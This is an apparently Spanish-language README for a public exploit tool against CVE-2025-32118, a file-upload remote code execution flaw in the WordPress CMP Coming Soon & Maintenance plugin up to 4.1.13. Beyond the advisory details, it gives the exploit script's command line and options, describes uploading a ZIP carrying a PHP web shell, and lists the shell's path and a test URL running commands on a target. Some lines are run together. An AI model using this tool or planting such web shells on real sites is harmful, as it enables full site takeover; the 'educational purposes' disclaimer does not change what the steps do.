
WordPress CMP – Complemento Coming Soon & Maintenance <= 4.1.13 - Vulnerabilidad de ejecución remota de código (RCE)
🔍 Título: WordPress CMP – Coming Soon & Maintenance plugin <= 4.1.13 - Ejecución Remota de Código (RCE)
🗓️ Publicado: 2025-04-04
🔐 CWE: CWE-434 - Carga sin restricciones de archivos de tipo peligroso
📊 CVSS: 9.1 (CRÍTICO) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Existe una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en el plugin CMP – Coming Soon & Maintenance para WordPress (<= 4.1.13).
Este fallo permite que un usuario administrador autenticado suba archivos ZIP maliciosos que contienen shells PHP ejecutables, lo que lleva al compromiso total del sitio.
<= 4.1.13)python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| Flag | Descripción |
|---|---|
-u | URL base del sitio WordPress |
-un | nombre de usuario |
-p | contraseña |
nonce válido para la solicitud de subida.style.css (formato de tema válido)nxploitedshell.php (carga útil RCE)?cmd=whoami.Una vez subida con éxito, la shell se ubicará en:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
Pruébalo mediante:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
Este exploit es solo con fines educativos.
El uso no autorizado de este código en sistemas que no posees es ilegal y poco ético.
Nxploited | Khaled Alenazi